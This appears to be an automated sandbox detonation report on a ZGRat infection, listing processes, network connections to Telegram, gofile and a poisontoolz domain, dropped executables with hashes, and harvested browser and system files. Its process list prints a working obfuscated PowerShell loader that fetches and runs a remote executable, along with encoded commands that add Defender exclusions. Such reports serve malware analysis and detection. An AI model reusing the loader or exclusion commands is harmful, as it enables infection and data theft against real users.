chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | icanhazip.com | udp |
| US | 104.18.115.97:80 | icanhazip.com | tcp |
| US | 8.8.8.8:53 | evcs-ocsp.ws.symantec.com | udp |
| US | 152.199.19.74:80 | evcs-ocsp.ws.symantec.com | tcp |
| US | 8.8.8.8:53 | 97.115.18.104.in-addr.arpa | udp |
| US | 104.18.115.97:80 | icanhazip.com | tcp |
| US | 8.8.8.8:53 | 74.19.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | store9.gofile.io | udp |
| US | 206.168.190.239:443 | store9.gofile.io | tcp |
| US | 8.8.8.8:53 | 239.190.168.206.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 104.18.115.97:80 | icanhazip.com | tcp |
| US | 162.159.129.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
memory/3856-1-0x0000000000240000-0x0000000000458000-memory.dmp
memory/3856-0-0x0000000074790000-0x0000000074F40000-memory.dmp
memory/3856-2-0x0000000004D90000-0x0000000004DA0000-memory.dmp
memory/3856-3-0x0000000004EE0000-0x00000000050E8000-memory.dmp
memory/3856-4-0x0000000005160000-0x000000000536A000-memory.dmp
memory/3856-5-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-10-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-14-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-18-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-24-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-28-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-34-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-36-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-40-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-44-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-48-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-50-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-54-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-58-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-62-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-66-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-68-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-64-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-60-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-56-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-52-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-46-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-42-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-38-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-32-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-30-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-26-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-22-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-20-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-16-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-12-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-8-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-6-0x0000000005160000-0x0000000005364000-memory.dmp
memory/3856-937-0x0000000005370000-0x0000000005371000-memory.dmp
memory/3856-939-0x0000000005400000-0x000000000544C000-memory.dmp
memory/3856-938-0x0000000005620000-0x00000000057C2000-memory.dmp
memory/3856-940-0x0000000006DF0000-0x0000000007394000-memory.dmp
memory/2148-944-0x0000000000400000-0x0000000000592000-memory.dmp
memory/2148-947-0x0000000005180000-0x00000000051E6000-memory.dmp
memory/2148-946-0x0000000074790000-0x0000000074F40000-memory.dmp
memory/3856-945-0x0000000074790000-0x0000000074F40000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\File2crypt.exe.log
| MD5 | 4a911455784f74e368a4c2c7876d76f4 |
| SHA1 | a1700a0849ffb4f26671eb76da2489946b821c34 |
| SHA256 | 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c |
| SHA512 | 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d |
memory/2148-948-0x0000000005170000-0x0000000005180000-memory.dmp
memory/2148-953-0x0000000005160000-0x0000000005168000-memory.dmp
memory/2148-952-0x00000000056F0000-0x0000000005716000-memory.dmp
memory/2148-951-0x0000000005660000-0x00000000056F2000-memory.dmp
memory/2148-955-0x00000000067A0000-0x00000000067A8000-memory.dmp
memory/2148-956-0x00000000067C0000-0x00000000067DE000-memory.dmp
memory/2148-954-0x0000000006790000-0x000000000679A000-memory.dmp
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2148-1013-0x0000000006B20000-0x0000000006BB2000-memory.dmp
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\Process.txt
| MD5 | cd3f1b337705d2b32c17dc4adc97a2b4 |
| SHA1 | 45e048692510d63446ee2a5ecabe106b89306bd4 |
| SHA256 | d8d763b2649f655efa9b5cf7eb82b56be32bfafbc098577736de35e875d87a48 |
| SHA512 | 2bd512434dd7066dab77565136dcbe73d869191ef4f09bc458529af3d0b4c88c5898fcdbd644dad80259e12cbefffe36d26a3fe2c252b47117c1a29a7cc9200f |
memory/2148-1112-0x0000000005170000-0x0000000005180000-memory.dmp
memory/2148-1114-0x0000000005170000-0x0000000005180000-memory.dmp
memory/2148-1148-0x00000000068B0000-0x000000000692A000-memory.dmp
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\Apps.txt
| MD5 | 8e3475a0678a63edc092dda39fc9bb2d |
| SHA1 | 589ce3f8ba1797024f6c0ab06b248c67cf739cac |
| SHA256 | d2ab564b653221a1ee2f60b56437698ea39533e8aaff5773eb4506c3be227099 |
| SHA512 | fe263f2624d887400570d3ccaf1c6e79b239f62a1ca20e3bca6c928056be7c84b405ad80dc4bd91b073272a76852ddc8032d586142e272db2beafafd1a0ad96f |
memory/2148-1221-0x00000000069D0000-0x0000000006A82000-memory.dmp
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\System\Debug.txt
| MD5 | 6038c6816d6cd11f7c460c00b2238fc6 |
| SHA1 | d4e182455aa02a3363a6ebb5cb0ea987b2507b69 |
| SHA256 | 856b43e957bd20204f0f34b645706175d6eeb18120e135eccae5d39d99780ca0 |
| SHA512 | b00b0ce6fb86f2298c18c6ce748f71882aefe6d995b61e82494edb4647849596537b7e40c8dd7e64d5eae24d2496063d6aa9a24d9ce5a354ca94a85bb6ee4278 |
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\Directories\Startup.txt
| MD5 | 68c93da4981d591704cea7b71cebfb97 |
| SHA1 | fd0f8d97463cd33892cc828b4ad04e03fc014fa6 |
| SHA256 | 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483 |
| SHA512 | 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402 |
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\Admin@GAWKBMOT_en-US\Directories\OneDrive.txt
| MD5 | 966247eb3ee749e21597d73c4176bd52 |
| SHA1 | 1e9e63c2872cef8f015d4b888eb9f81b00a35c79 |
| SHA256 | 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e |
| SHA512 | bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa |
memory/2148-1223-0x0000000006D20000-0x0000000006D42000-memory.dmp
memory/2148-1224-0x0000000007E20000-0x0000000008174000-memory.dmp
C:\Users\Admin\AppData\Local\e2fc4e3155b3fb3d7ad22e986531550f\msgid.dat
| MD5 | 2c293d26d4955cc89b70566a8fd0b371 |
| SHA1 | 20849f72e81215208fc91c52ba2caf57993466bb |
| SHA256 | 499481147f342836968aa4af73d5280686a48c91eb9837eda1a1cfcf07f59121 |
| SHA512 | 2b82cfed0ce3d49376eacdede47010965d529cc45d8c26d9d0bc96df56005f65eef608c177d21fd073284cb3985fbf238bd7ef66638b968977e6a7d01148810a |
memory/2148-1236-0x0000000006E70000-0x0000000006E7A000-memory.dmp
memory/2148-1237-0x0000000074790000-0x0000000074F40000-memory.dmp
memory/2148-1238-0x0000000005170000-0x0000000005180000-memory.dmp
memory/2148-1239-0x0000000005170000-0x0000000005180000-memory.dmp
memory/2148-1240-0x0000000005170000-0x0000000005180000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Binded.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe | C:\Users\Admin\AppData\Local\Temp\rock.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe | C:\Users\Admin\AppData\Local\Temp\rock.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Binded.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\blbrok.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\rock.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wqjqot.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wqjqot.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3756 set thread context of 5004 | N/A | C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 3200 set thread context of 1924 | N/A | C:\Users\Admin\AppData\Local\Temp\wqjqot.exe | C:\Users\Admin\AppData\Local\Temp\wqjqot.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\blbrok.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\rock.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\wqjqot.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\wqjqot.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\binded.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function ckCYMarg($ZMHRISzDhdwdY, $aumfRHUmZgmLSBs){[IO.File]::WriteAllBytes($ZMHRISzDhdwdY, $aumfRHUmZgmLSBs)};function WypStgKENDEIcA($ZMHRISzDhdwdY){if($ZMHRISzDhdwdY.EndsWith((FPFknBqQsu @(58099,58153,58161,58161))) -eq $True){rundll32.exe $ZMHRISzDhdwdY }elseif($ZMHRISzDhdwdY.EndsWith((FPFknBqQsu @(58099,58165,58168,58102))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ZMHRISzDhdwdY}elseif($ZMHRISzDhdwdY.EndsWith((FPFknBqQsu @(58099,58162,58168,58158))) -eq $True){misexec /qn /i $ZMHRISzDhdwdY}else{Start-Process $ZMHRISzDhdwdY}};function TXuAgVFpQG($hindkrPqZcNyrlU){$RgafzCFGvzVmJX = New-Object (FPFknBqQsu @(58131,58154,58169,58099,58140,58154,58151,58120,58161,58158,58154,58163,58169));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$aumfRHUmZgmLSBs = $RgafzCFGvzVmJX.DownloadData($hindkrPqZcNyrlU);return $aumfRHUmZgmLSBs};function FPFknBqQsu($rxPrWTWbbzv){$lzrQhUf=58053;$IgPoeJQDbcreOFG=$Null;foreach($SheyHVSxpFbk in $rxPrWTWbbzv){$IgPoeJQDbcreOFG+=[char]($SheyHVSxpFbk-$lzrQhUf)};return $IgPoeJQDbcreOFG};function OCOpOfqedID(){$SFaTrukxkqfhJljN = $env:AppData + '\';$AHqkDmXF = $SFaTrukxkqfhJljN + 'Binded.exe'; if (Test-Path -Path $AHqkDmXF){WypStgKENDEIcA $AHqkDmXF;}Else{ $jiPMwkwJERZcU = TXuAgVFpQG (FPFknBqQsu @(58157,58169,58169,58165,58168,58111,58100,58100,58162,58150,58156,58158,58152,58099,58165,58164,58158,58168,58164,58163,58169,58164,58164,58161,58175,58099,58152,58164,58162,58100,58119,58158,58163,58153,58154,58153,58099,58154,58173,58154));ckCYMarg $AHqkDmXF $jiPMwkwJERZcU;WypStgKENDEIcA $AHqkDmXF;};;;;}OCOpOfqedID;
C:\Users\Admin\AppData\Roaming\Binded.exe
"C:\Users\Admin\AppData\Roaming\Binded.exe"
C:\Users\Admin\AppData\Local\Temp\rock.exe
"C:\Users\Admin\AppData\Local\Temp\rock.exe"
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
"C:\Users\Admin\AppData\Local\Temp\blbrok.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA
C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe
C:\Users\Admin\AppData\Local\Hash\xeiba\TypeId.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA
C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
C:\Users\Admin\AppData\Local\Temp\wqjqot.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.10.21.104.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 138.91.171.81:80 | tcp | |
| NL | 52.142.223.178:80 | tcp | |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 53.191.33.194.in-addr.arpa | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| NL | 149.154.167.220:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 52.140.118.28:443 | tcp | |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 52.140.118.28:443 | tcp | |
| N/A | 52.140.118.28:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.114.59.183:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.3.187.198:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.114.59.183:443 | tcp | |
| N/A | 20.114.59.183:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 104.77.160.23:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 194.33.191.53:58001 | tcp | |
| US | 8.8.8.8:53 | udp | |
| GB | 96.17.179.12:80 | tcp | |
| N/A | 194.33.191.53:58001 | tcp |
Files
memory/3844-3-0x00000000048C0000-0x00000000048D0000-memory.dmp
memory/3844-4-0x0000000004F00000-0x0000000005528000-memory.dmp
memory/3844-2-0x00000000048C0000-0x00000000048D0000-memory.dmp
memory/3844-5-0x0000000004CE0000-0x0000000004D02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wwysozym.tol.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3844-16-0x0000000005770000-0x00000000057D6000-memory.dmp
memory/3844-6-0x00000000055D0000-0x0000000005636000-memory.dmp
memory/3844-1-0x0000000071ED0000-0x0000000072680000-memory.dmp
memory/3844-0-0x0000000004700000-0x0000000004736000-memory.dmp
memory/3844-17-0x00000000057E0000-0x0000000005B34000-memory.dmp
memory/3844-19-0x0000000005D40000-0x0000000005D8C000-memory.dmp
memory/3844-18-0x0000000005C80000-0x0000000005C9E000-memory.dmp
memory/3844-22-0x0000000006230000-0x0000000006252000-memory.dmp
memory/3844-23-0x00000000072B0000-0x0000000007854000-memory.dmp
memory/3844-21-0x00000000061C0000-0x00000000061DA000-memory.dmp
memory/3844-20-0x0000000006C60000-0x0000000006CF6000-memory.dmp
memory/3844-24-0x0000000007EE0000-0x000000000855A000-memory.dmp
memory/2908-39-0x0000000000D80000-0x00000000012F2000-memory.dmp
memory/2908-40-0x00007FFEA6180000-0x00007FFEA6C41000-memory.dmp
memory/2908-41-0x000000001BFE0000-0x000000001BFF0000-memory.dmp
memory/3844-38-0x0000000071ED0000-0x0000000072680000-memory.dmp
C:\Users\Admin\AppData\Roaming\Binded.exe
| MD5 | e447ce4e0dd50659d1ed5328ae95c742 |
| SHA1 | 279e5fe69fdd32158117c272c0ac206b4a393896 |
| SHA256 | 3b6bf86b11ea507fbb214c9ed26210d25f48656b03a7d56134ce63e49c388e41 |
| SHA512 | 7064301eac7ab2e2d2a9cd2d12c0ab236585de5f2d7476b51e00180f7f7de65736a4abfbfbec568768963deea1753b3011a09d50e5a24e3c00a36f840241b86d |
C:\Users\Admin\AppData\Roaming\Binded.exe
| MD5 | 8bf787cd1198e3127190462262c66af7 |
| SHA1 | c3bd6e1278ef871d0804512f3dc27ab8673027f9 |
| SHA256 | efeb073272216decf23b6885215f4cb16a68c631c0054ba411fc32757f1df130 |
| SHA512 | 7f0cf90bd61456f331f078eaf20e91940ab2146aa5905b64ee06dc91bcb07a7da74c864996421942b4f0dd51055f805cc9add964a2136a1b8f2fec6dee982266 |
C:\Users\Admin\AppData\Roaming\Binded.exe
| MD5 | 09379b3c4a2c8d7e740d9418deea490a |
| SHA1 | 305cdfded9fb5a12904fb2712d2f2a989f6814a2 |
| SHA256 | 7833cadca8b516636500eaac8479e6644c06af9dbbd5cd613a2276ba34ac03a1 |
| SHA512 | 116d6d6127b0d32a10ec5ea09d37c627c188727ea3e1df609c8a31e3c332fc56b877d7492ce001c58821c25ccb3d9dd62fbf8cd67e28fb1b27810fbbb29a63ab |
C:\Users\Admin\AppData\Local\Temp\rock.exe
| MD5 | 03bfe4f50a77d2467b47614d34c42fb6 |
| SHA1 | 4e3ab73980dc220bdc9c207788f199b572d488b5 |
| SHA256 | 2072b19de24e8246be2422ba3122cfef2e11e4bcc3ef46bfce22b886f6e168f3 |
| SHA512 | 338fb3ddd309b81bad5af5dbc7f2c60080124736a10d5dee76dba36c2730f20842f69a7e347b82a3285e7b4b937c1688a5064061f5cc02fcb03c2180112a524e |
C:\Users\Admin\AppData\Local\Temp\blbrok.exe
| MD5 | 2af26422ada303194e29a808560b21bf |
| SHA1 | eefb4a2823d85c20862754950027bf316e898310 |
| SHA256 | 46c6fa4a583cf1a287fc09f9bf57bc8e91d817559de7f5c9ce5194a1d32bcc9e |
| SHA512 | 1bbdf1d604ba208f000906722045dd0e3c5aa1655c22e0979d9d4eba41e4bb1c21fcbcef1aeba49f8f9109764d71b2dde2813672fddda2c85784d3bcfdbf435d |
memory/3972-72-0x0000000004CE0000-0x0000000004CF0000-memory.dmp
memory/3972-81-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-87-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
memory/3972-95-0x0000000004BE0000-0x0000000004CC2000-memory.dmp
